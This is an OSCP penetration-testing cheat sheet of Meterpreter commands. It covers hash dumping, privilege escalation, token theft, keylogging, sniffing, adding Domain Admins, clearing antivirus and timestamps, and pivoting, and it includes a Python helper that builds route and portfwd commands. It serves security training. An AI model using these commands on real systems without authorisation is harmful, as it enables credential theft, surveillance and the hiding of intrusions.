
Oscp - Meterpreter

Basic Commands

sysinfo
getpid
getuid
ps
ps -S notepad.exe
kill <pid>
ipconfig
route
migrate <PID>
getsystem
getprivs
use priv
hashdump
shell
background

File System Commands

ls
pwd
cd
del <file>
cat <file>
edit <file>
upload <src_file> <dst_file>
download <src_file> <dst_file>
getwd
getlwd

Port Forwarding

We have compromised victim1 and hold a Meterpreter session on it with id session_id. Background the Meterpreter session and add the route below. It makes Metasploit send all traffic for victim2_subnet through the session on victim1. The route only affects Metasploit's own modules (scanners, exploits, further sessions); it does not change the routing table of Kali or of victim1.
route add <victim2_subnet> <netmask> <session_id>
route -h
route list
route delete <victim2_subnet> <netmask> <session_id>
portfwd opens a listener on Kali (localhost) and forwards connections from port l there to port p of Target2 through the compromised Target1. This rides the Meterpreter session directly, so it works with or without the route above, and non-Metasploit tools (rdesktop, ssh, a browser) can then talk to 127.0.0.1:l.
portfwd
portfwd add -l 1111 -p 2222 -r Target2
portfwd delete -l 1111 -p 2222 -r Target2
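The pivot setup above, as an added example that is not code from the original page: a small Python helper that turns a CIDR subnet, a session id and a list of forwards into the exact `route add` / `portfwd add` lines (and the matching delete lines, in reverse order) so they can be pasted into msfconsole or saved as a resource script. The netmask conversion matters because the `route add` syntax shown here takes a dotted netmask, not a prefix length. The function and class names (`build_pivot_commands`, `PortForward`) are this example's own, and the sample subnet and hosts are constructed.

```python
"""Emit the Meterpreter route/portfwd command sequence for a two-hop pivot.

Added example (not from the original page). Assumed names: PortForward,
build_pivot_commands. Sample subnet 10.10.20.0/24 and host 10.10.20.5 are
constructed for illustration.
"""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class PortForward:
    local_port: int    # -l : listener opened on the attacker (Kali) box
    remote_port: int   # -p : port on the second-hop target
    remote_host: str   # -r : second-hop target reached through victim1


def build_pivot_commands(subnet_cidr, session_id, forwards):
    """Return (setup, teardown): two lists of msfconsole/Meterpreter commands.

    subnet_cidr : the victim2 subnet, e.g. "10.10.20.0/24"
    session_id  : id of the Meterpreter session on victim1 (positive int)
    forwards    : iterable of PortForward
    """
    if not isinstance(session_id, int) or session_id < 1:
        raise ValueError("session_id must be a positive integer")
    # strict=True rejects host bits set in the network part (e.g. 10.10.20.5/24)
    net = ipaddress.ip_network(subnet_cidr, strict=True)
    # `route add` takes <subnet> <dotted netmask> <session>, so convert the prefix.
    route_args = f"{net.network_address} {net.netmask} {session_id}"

    forwards_add, forwards_del = [], []
    for fwd in forwards:
        host = ipaddress.ip_address(fwd.remote_host)
        # portfwd rides the session itself and does not need the route; this
        # check only catches a mistyped target outside the subnet you declared
        # reachable through victim1.
        if host not in net:
            raise ValueError(f"{fwd.remote_host} is not inside {net}")
        for port in (fwd.local_port, fwd.remote_port):
            if not 1 <= port <= 65535:
                raise ValueError(f"port {port} out of range")
        args = f"-l {fwd.local_port} -p {fwd.remote_port} -r {fwd.remote_host}"
        forwards_add.append(f"portfwd add {args}")
        forwards_del.append(f"portfwd delete {args}")

    setup = [f"route add {route_args}"] + forwards_add
    # Tear down in reverse: drop the listeners first, then the route.
    teardown = forwards_del[::-1] + [f"route delete {route_args}"]
    return setup, teardown


if __name__ == "__main__":
    # Constructed sample: session 1 on victim1, RDP on a host behind it.
    up, down = build_pivot_commands(
        "10.10.20.0/24", 1, [PortForward(3389, 3389, "10.10.20.5")]
    )
    print("\n".join(up))
    print("# teardown")
    print("\n".join(down))
```

Run it and paste the setup lines into msfconsole after backgrounding the session; `rdesktop 127.0.0.1:3389` on Kali then reaches 10.10.20.5 through victim1. The teardown lines are printed in the order that leaves nothing dangling.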

Execute Processes

Execute cmd.exe and interact with it
execute -f cmd.exe -i
Execute cmd.exe with the currently impersonated thread token (see Tokens below)
execute -f cmd.exe -i -t
Execute cmd.exe with the currently impersonated thread token and make it a hidden process
execute -f cmd.exe -i -H -t
  1. -H Create the process hidden from view
  2. -a Arguments to pass to the command
  3. -i Interact with the process after creating it
  4. -m Execute from memory
  5. -t Execute process with currently impersonated thread token
Run Meterpreter-based scripts; for a full listing check the scripts/meterpreter directory
run <scriptname>

Registry

Interact with, create, delete, query, set and much more in the target's registry
reg <command> [options]
commands:
  enumkey -> Enumerate the supplied registry key
  createkey / deletekey -> Create/delete the supplied registry key
  setval / queryval -> Set/query values in the supplied registry key
options:
  -d -> Data to store in the registry value
  -k -> The registry key
  -v -> The registry value name

Tokens

use incognito
list_tokens -u
list_tokens -g
impersonate_token DOMAIN_NAME\\USERNAME
steal_token PID
drop_token
rev2self

Sniffing

use sniffer
sniffer_interfaces
sniffer_dump <interfaceID> <pcapname>
sniffer_start <interfaceID> [packet-buffer]
sniffer_stats <interfaceID>
sniffer_stop <interfaceID>

Post Exploitation

add_user username password -h ip
add_group_user "Domain Admins" username -h ip
clearav
timestomp
screenshot
keyscan_start
keyscan_dump
keyscan_stop
uictl enable keyboard/mouse
setdesktop
shutdown
reboot
run post/windows/manage/enable_rdp
Run msfmap
Download it from http://code.google.com/p/msfmap, then:
load msfmap
msfmap
